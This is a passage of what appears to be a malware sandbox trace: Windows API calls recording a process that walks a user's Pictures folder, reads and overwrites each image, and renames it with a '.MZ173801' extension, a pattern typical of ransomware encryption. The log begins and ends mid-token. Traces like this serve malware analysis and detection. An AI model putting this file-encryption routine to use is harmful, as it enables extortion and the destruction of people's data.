DFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0114.218] GetCurrentThreadId () returned 0x1358 [0114.218] GetCurrentThreadId () returned 0x1358 [0114.218] GetCurrentThreadId () returned 0x1358 [0114.218] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\HzRoNmrPEEYbe.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\hzronmrpeeybe.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f8 [0114.218] SetFilePointer (in: hFile=0x3f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0114.219] SetFilePointer (in: hFile=0x3f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0114.219] SetFilePointer (in: hFile=0x3f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x11b28 [0114.219] SetFilePointer (in: hFile=0x3f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0114.219] ReadFile (in: hFile=0x3f8, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x11b28, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0x11b28, lpOverlapped=0x0) returned 1 [0114.220] CloseHandle (hObject=0x3f8) returned 1 [0114.221] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\HzRoNmrPEEYbe.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\hzronmrpeeybe.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f8 [0114.223] WriteFile (in: hFile=0x3f8, lpBuffer=0x23c2ad0*, nNumberOfBytesToWrite=0x11b28, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x23c2ad0*, lpNumberOfBytesWritten=0x19f9bc*=0x11b28, lpOverlapped=0x0) returned 1 [0114.224] CloseHandle (hObject=0x3f8) returned 1 [0114.227] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\HzRoNmrPEEYbe.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\hzronmrpeeybe.jpg"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\HzRoNmrPEEYbe.jpg.MZ173801" (normalized: "c:\\users\\fd1hvy\\pictures\\hzronmrpeeybe.jpg.mz173801")) returned 1 [0114.228] GetCurrentThreadId () returned 0x1358 [0114.228] GetCurrentThreadId () returned 0x1358 [0114.228] GetCurrentThreadId () returned 0x1358 [0114.228] GetCurrentThreadId () returned 0x1358 [0114.228] GetCurrentThreadId () returned 0x1358 [0114.228] GetCurrentThreadId () returned 0x1358 [0114.228] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf07a5200, ftCreationTime.dwHighDateTime=0x1d5e210, ftLastAccessTime.dwLowDateTime=0xc4a7a7f0, ftLastAccessTime.dwHighDateTime=0x1d5e741, ftLastWriteTime.dwLowDateTime=0xc4a7a7f0, ftLastWriteTime.dwHighDateTime=0x1d5e741, nFileSizeHigh=0x0, nFileSizeLow=0xe03b, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="K4Pe6YIq.bmp", cAlternateFileName="")) returned 1 [0114.228] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0114.228] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0114.228] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\K4Pe6YIq.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\k4pe6yiq.bmp"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf07a5200, ftCreationTime.dwHighDateTime=0x1d5e210, ftLastAccessTime.dwLowDateTime=0xc4a7a7f0, ftLastAccessTime.dwHighDateTime=0x1d5e741, ftLastWriteTime.dwLowDateTime=0xc4a7a7f0, ftLastWriteTime.dwHighDateTime=0x1d5e741, nFileSizeHigh=0x0, nFileSizeLow=0xe03b)) returned 1 [0114.229] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0114.229] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0114.229] GetCurrentThreadId () returned 0x1358 [0114.229] GetCurrentThreadId () returned 0x1358 [0114.229] GetCurrentThreadId () returned 0x1358 [0114.229] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0114.229] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0114.230] GetCurrentThreadId () returned 0x1358 [0114.230] GetCurrentThreadId () returned 0x1358 [0114.230] GetCurrentThreadId () returned 0x1358 [0114.230] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\K4Pe6YIq.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\k4pe6yiq.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f8 [0114.230] SetFilePointer (in: hFile=0x3f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0114.230] SetFilePointer (in: hFile=0x3f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0114.230] SetFilePointer (in: hFile=0x3f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0xe03b [0114.230] SetFilePointer (in: hFile=0x3f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0114.230] ReadFile (in: hFile=0x3f8, lpBuffer=0x2431b30, nNumberOfBytesToRead=0xe03b, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0xe03b, lpOverlapped=0x0) returned 1 [0114.231] CloseHandle (hObject=0x3f8) returned 1 [0114.232] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\K4Pe6YIq.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\k4pe6yiq.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f8 [0114.233] WriteFile (in: hFile=0x3f8, lpBuffer=0x23c2ad0*, nNumberOfBytesToWrite=0xe03b, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x23c2ad0*, lpNumberOfBytesWritten=0x19f9bc*=0xe03b, lpOverlapped=0x0) returned 1 [0114.235] CloseHandle (hObject=0x3f8) returned 1 [0114.237] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\K4Pe6YIq.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\k4pe6yiq.bmp"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\K4Pe6YIq.bmp.MZ173801" (normalized: "c:\\users\\fd1hvy\\pictures\\k4pe6yiq.bmp.mz173801")) returned 1 [0114.238] GetCurrentThreadId () returned 0x1358 [0114.238] GetCurrentThreadId () returned 0x1358 [0114.238] GetCurrentThreadId () returned 0x1358 [0114.238] GetCurrentThreadId () returned 0x1358 [0114.238] GetCurrentThreadId () returned 0x1358 [0114.239] GetCurrentThreadId () returned 0x1358 [0114.239] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x88049900, ftCreationTime.dwHighDateTime=0x1d5ea9f, ftLastAccessTime.dwLowDateTime=0xef3a7c90, ftLastAccessTime.dwHighDateTime=0x1d5ec64, ftLastWriteTime.dwLowDateTime=0xef3a7c90, ftLastWriteTime.dwHighDateTime=0x1d5ec64, nFileSizeHigh=0x0, nFileSizeLow=0x1480f, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="oA91dS68Kck7s8GQB.gif", cAlternateFileName="OA91DS~1.GIF")) returned 1 [0114.239] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0114.239] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0114.239] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\oA91dS68Kck7s8GQB.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\oa91ds68kck7s8gqb.gif"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x88049900, ftCreationTime.dwHighDateTime=0x1d5ea9f, ftLastAccessTime.dwLowDateTime=0xef3a7c90, ftLastAccessTime.dwHighDateTime=0x1d5ec64, ftLastWriteTime.dwLowDateTime=0xef3a7c90, ftLastWriteTime.dwHighDateTime=0x1d5ec64, nFileSizeHigh=0x0, nFileSizeLow=0x1480f)) returned 1 [0114.239] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0114.239] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0114.239] GetCurrentThreadId () returned 0x1358 [0114.239] GetCurrentThreadId () returned 0x1358 [0114.240] GetCurrentThreadId () returned 0x1358 [0114.240] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0114.240] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFB